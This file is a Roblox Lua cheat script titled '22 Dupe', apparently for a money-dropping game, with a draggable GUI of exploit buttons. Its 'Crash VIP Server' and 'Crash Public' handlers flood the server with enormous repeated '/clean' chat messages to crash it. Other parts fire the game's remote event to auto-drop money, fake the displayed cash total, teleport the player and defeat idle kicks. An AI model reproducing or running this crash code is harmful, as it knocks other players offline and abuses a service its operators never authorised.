-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local CrashServer = Instance.new("TextButton")
local CashAmount = Instance.new("TextButton")
local _22 = Instance.new("TextLabel")
local TextBox = Instance.new("TextBox")
local AutoDropStop = Instance.new("TextButton")
local AutoDropStart = Instance.new("TextButton")
local SafeTeleport = Instance.new("TextButton")
local AntiAfk = Instance.new("TextButton")
local Crash = Instance.new("TextButton")
local Credit = Instance.new("TextButton")
local Dupe = Instance.new("TextBox")
local TextBox_Roundify_12px = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.Active = true
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.Position = UDim2.new(0.454153031, 0, 0.359689832, 0)
Frame.Size = UDim2.new(0, 362, 0, 119)
Frame.Draggable = true

CrashServer.Name = "CrashServer"
CrashServer.Parent = Frame
CrashServer.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
CrashServer.BorderColor3 = Color3.fromRGB(127, 0, 190)
CrashServer.BorderSizePixel = 2
CrashServer.Position = UDim2.new(0.0677290186, 0, 0.47268942, 0)
CrashServer.Size = UDim2.new(0, 95, 0, 50)
CrashServer.Font = Enum.Font.PermanentMarker
CrashServer.Text = "Crash VIP Server"
CrashServer.TextColor3 = Color3.fromRGB(255, 255, 255)
CrashServer.TextSize = 14.000
CrashServer.MouseButton1Down:connect(function()
game.StarterGui:SetCore("SendNotification", {Title = "22 Dupe", Text = "Crashing..", Icon = "rbxassetid://505845268", Duration = 60, Button1 = "Okay"})
wait(0) local A_1 = "Crashing the Server with 22 Dupe.." local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) 

local natass = "/"

    local Message = (natass.. "clean".." "):rep(10000000)

    for i = 1, 75000 do
        game.Players:Chat(Message)
    end

    local notifSound = Instance.new("Sound",workspace)
    	notifSound.PlaybackSpeed = 1
    	notifSound.Volume = 0.5
    	notifSound.SoundId = "rbxassetid://1837974324"
    	notifSound.PlayOnRemove = true
    	notifSound:Destroy()

end)


CashAmount.Name = "CashAmount"
CashAmount.Parent = Frame
CashAmount.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
CashAmount.BorderColor3 = Color3.fromRGB(0, 0, 0)
CashAmount.Position = UDim2.new(0.42397783, 0, 0.25454835, 0)
CashAmount.Size = UDim2.new(0, 83, 0, 16)
CashAmount.Font = Enum.Font.PermanentMarker
CashAmount.Text = "Cash Amount"
CashAmount.TextColor3 = Color3.fromRGB(255, 255, 255)
CashAmount.TextSize = 13.000
CashAmount.MouseButton1Down:connect(function()
local player = game.Players.LocalPlayer
local character = player.Character
local money = 0
local formatNumber = (function (n)
    n = tostring(n)
    return n:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
end)
    
    local function SetCash()
        money = 0
        for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
            if v.Name == 'MoneyDrop' then
                local string = v.BillboardGui.TextLabel.Text
                local filtered = string.gsub(string, "[^%w ]", "")
                local cash = tonumber(filtered)
                money = money + cash
            end
        end
        game:GetService("Players"):FindFirstChild(game.Players.LocalPlayer.Name).PlayerGui.MainScreenGui.Bar.Energy.TextLabel.Text = formatNumber(money)
    end
while wait()do 
    SetCash()

end

end)

_22.Name = "22"
_22.Parent = Frame
_22.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_22.BackgroundTransparency = 100.000
_22.BorderColor3 = Color3.fromRGB(0, 0, 0)
_22.Position = UDim2.new(-0.185541302, 0, 0.0379649401, 0)
_22.Size = UDim2.new(0, 200, 0, 50)
_22.Font = Enum.Font.PermanentMarker
_22.Text = "22"
_22.TextColor3 = Color3.fromRGB(255, 255, 255)
_22.TextSize = 30.000

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(132, 0, 198)
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.Position = UDim2.new(0.425063133, 0, 0.431711346, 0)
TextBox.Size = UDim2.new(0, 83, 0, 16)
TextBox.Font = Enum.Font.PermanentMarker
TextBox.Text = "Auto Drop"
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000

_G.DROPCASH = false

AutoDropStop.Name = "AutoDropStop"
AutoDropStop.Parent = Frame
AutoDropStop.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
AutoDropStop.BorderColor3 = Color3.fromRGB(121, 0, 182)
AutoDropStop.Position = UDim2.new(0.549723744, 0, 0.61344564, 0)
AutoDropStop.Size = UDim2.new(0, 46, 0, 33)
AutoDropStop.Font = Enum.Font.PermanentMarker
AutoDropStop.Text = "Stop"
AutoDropStop.TextColor3 = Color3.fromRGB(255, 255, 255)
AutoDropStop.TextSize = 14.000
AutoDropStop.MouseButton1Click:connect(function()
game.StarterGui:SetCore("SendNotification", {
      Title = "22 Dupe";
      Text = "Stopped Auto-Dropping"
    })
	_G.DROPCASH = false
end)



AutoDropStart.Name = "AutoDropStart"
AutoDropStart.Parent = Frame
AutoDropStart.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
AutoDropStart.BorderColor3 = Color3.fromRGB(121, 0, 182)
AutoDropStart.Position = UDim2.new(0.406077325, 0, 0.61344564, 0)
AutoDropStart.Size = UDim2.new(0, 46, 0, 33)
AutoDropStart.Font = Enum.Font.PermanentMarker
AutoDropStart.Text = "Start"
AutoDropStart.TextColor3 = Color3.fromRGB(255, 255, 255)
AutoDropStart.TextSize = 14.000
AutoDropStart.MouseButton1Click:connect(function()


game.StarterGui:SetCore("SendNotification", {
      Title = "22 Dupe";
      Text = "Started Auto-Dropping"
    })
	_G.DROPCASH = true


end)


  Crash.Name = "Crash"
  Crash.Parent = Frame
  Crash.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  Crash.BorderColor3 = Color3.fromRGB(121, 0, 182)
  Crash.Position = UDim2.new(0.727192104, 0, 0.145436764, 0)
  Crash.Size = UDim2.new(0, 81, 0, 21)
  Crash.Font = Enum.Font.PermanentMarker
  Crash.Text = "Crash Public"
  Crash.TextColor3 = Color3.fromRGB(255, 255, 255)
  Crash.TextSize = 14.000
  Crash.MouseButton1Down:connect(function()
  wait(0) local A_1 = "Crashing the Server with 22 Dupe.." local A_2 = "All" local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2) 

	local prefixe = "/"

	local Message = (prefixe.. "clean".." "):rep(100000)

	for i = 1, 750 do
			game.Players:Chat(Message)
	end

    local notifSound = Instance.new("Sound",workspace)
    	notifSound.PlaybackSpeed = 1
    	notifSound.Volume = 0.5
    	notifSound.SoundId = "rbxassetid://170765130"
    	notifSound.PlayOnRemove = true
    	notifSound:Destroy()
      game.StarterGui:SetCore("SendNotification", {Title = "22 Dupe", Text = "Crashing...", Icon = "rbxassetid://505845268", Duration = 30, Button1 = "Okay"})

  end)


  
    SafeTeleport.Name = "SafeTeleport"
    SafeTeleport.Parent = Frame
    SafeTeleport.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    SafeTeleport.BorderColor3 = Color3.fromRGB(121, 0, 182)
    SafeTeleport.Position = UDim2.new(0.727192104, 0, 0.715380132, 0)
    SafeTeleport.Size = UDim2.new(0, 81, 0, 21)
    SafeTeleport.Font = Enum.Font.PermanentMarker
    SafeTeleport.Text = "Safe Teleport"
    SafeTeleport.TextColor3 = Color3.fromRGB(255, 255, 255)
    SafeTeleport.TextSize = 14.000
    SafeTeleport.MouseButton1Down:connect(function()
    --game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-118, -87, 150))
    game.Players.LocalPlayer.Character:MoveTo(Vector3.new(200, 38, 200015))
    local notifSound = Instance.new("Sound",workspace) 
    	notifSound.PlaybackSpeed = 1
    	notifSound.Volume = 0.5
    	notifSound.SoundId = "rbxassetid://170765130"
    	notifSound.PlayOnRemove = true
    	notifSound:Destroy()
    game.StarterGui:SetCore("SendNotification", {
    		Title = "22 Dupe";
    		Text = "Teleported to Secret Place."
    	})
    end)


AntiAfk.Name = "AntiAfk"
AntiAfk.Parent = Frame
AntiAfk.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
AntiAfk.BorderColor3 = Color3.fromRGB(121, 0, 182)
AntiAfk.Position = UDim2.new(0.727192104, 0, 0.430408448, 0)
AntiAfk.Size = UDim2.new(0, 81, 0, 21)
AntiAfk.Font = Enum.Font.PermanentMarker
AntiAfk.Text = "Anti Afk"
AntiAfk.TextColor3 = Color3.fromRGB(255, 255, 255)
AntiAfk.TextSize = 14.000
AntiAfk.MouseButton1Down:connect(function()
-- Anti-AFK Script
local vu = game:GetService("VirtualUser")
    game:GetService("Players").LocalPlayer.Idled:connect(function()
        vu:Button2Down(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
        wait(1)
        vu:Button2Up(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
    end)
print("Anti-Afk Success!")
local notifSound = Instance.new("Sound",workspace)
	notifSound.PlaybackSpeed = 1
	notifSound.Volume = 0.5
	notifSound.SoundId = "rbxassetid://170765130"
	notifSound.PlayOnRemove = true
	notifSound:Destroy()
  game.StarterGui:SetCore("SendNotification", {
  		Title = "22 Dupe";
  		Text = "Anti Afk Enabled."
  	})
  
end)



Credit.Name = "Credit"
Credit.Parent = Frame
Credit.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Credit.BackgroundTransparency = 100.000
Credit.BorderColor3 = Color3.fromRGB(0, 0, 0)
Credit.Position = UDim2.new(0.38397783, 0, 0.040454835, 0)
Credit.Size = UDim2.new(0, 116, 0, 27)
Credit.Font = Enum.Font.PermanentMarker
Credit.Text = "Credit: kristina#1111"
Credit.TextColor3 = Color3.fromRGB(85, 255, 255)
Credit.TextSize = 14.000
Credit.TextStrokeColor3 = Color3.fromRGB(85, 255, 255)
Credit.MouseButton1Down:connect(function()


end)


Dupe.Name = "Dupe"
Dupe.Parent = Frame
Dupe.BackgroundColor3 = Color3.fromRGB(105, 0, 161)
Dupe.BackgroundTransparency = 1.000
Dupe.BorderColor3 = Color3.fromRGB(0, 0, 0)
Dupe.BorderSizePixel = 0
Dupe.Position = UDim2.new(0.195132434, 0, 0.302679121, 0)
Dupe.Size = UDim2.new(0, 23, 0, 10)
Dupe.Font = Enum.Font.SourceSansBold
Dupe.Text = ""
Dupe.TextColor3 = Color3.fromRGB(255, 255, 255)
Dupe.TextSize = 30.000

TextBox_Roundify_12px.Name = "TextBox_Roundify_12px"
TextBox_Roundify_12px.Parent = Dupe
TextBox_Roundify_12px.Active = true
TextBox_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5)
TextBox_Roundify_12px.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox_Roundify_12px.BackgroundTransparency = 1.000
TextBox_Roundify_12px.Position = UDim2.new(0.799019217, 0, -0.73563993, 0)
TextBox_Roundify_12px.Selectable = true
TextBox_Roundify_12px.Size = UDim2.new(2.91325879, 0, 3.24423265, 0)
TextBox_Roundify_12px.Image = "rbxassetid://3570695787"
TextBox_Roundify_12px.ImageColor3 = Color3.fromRGB(105, 0, 161)
TextBox_Roundify_12px.ScaleType = Enum.ScaleType.Slice
TextBox_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100)
TextBox_Roundify_12px.SliceScale = 0.120

TextLabel.Parent = Dupe
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 100.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.Position = UDim2.new(-1.51195645, 0, -3.39361691, 0)
TextLabel.Size = UDim2.new(0, 103, 0, 52)
TextLabel.Font = Enum.Font.PermanentMarker
TextLabel.Text = "Dupe"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 30.000

while true do
	wait()
	if _G.DROPCASH == true then
		local A_1 = "DropMoney"
		local A_2 = "" ..TextBox.Text
		local Event = game:GetService("ReplicatedStorage").MainEvent
		Event:FireServer(A_1, A_2)
	end
end
